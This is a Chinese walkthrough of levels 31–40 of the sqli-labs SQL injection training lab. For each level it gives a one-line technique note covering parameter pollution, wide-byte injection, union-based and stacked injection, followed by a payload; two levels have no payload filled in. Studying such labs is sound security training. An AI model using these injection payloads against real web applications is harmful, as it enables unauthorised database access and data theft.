sqli-labs详细全解31-40
第三十一关:
login.php 只对第一个参数进行了检测,而第二个参数并没有进行过滤。
payload:id=2&id=1") and 1=12-- -
第三十二关:
宽字节注入
payload:id=1%df’ and 1=1-- -
第三十三关:
宽字节注入:
payload:id=1%df’ and 1=2 union select 1,user(),3-- -
第三十四关:
post方式的宽字节注入
payload:
第三十五关:
虽然开启了魔术引号,但因为不需要引号闭合,所以相当于普通的数字型注入
payload:1 and 1=2 union select 1,2,version()
第三十六关:
宽字节注入:
payload:id=1%DF’ and 1=2 union select 1,2,version() – -
第三十七关:
宽字节注入:
payload:
第三十八关:
普通的字符型注入,堆叠注入:
payload:id=1’ and 1=2 union select 11,22,version() – -
第三十九关:
普通的数字型注入,堆叠注入:
payload:id=2 and 1=2 union select 1,2,version()-- -
第四十关:
字符型注入,堆叠注入。
payload:id=1’) and 1=2 union select 1,version(),3-- -
payload:id=1’);create database dddd – -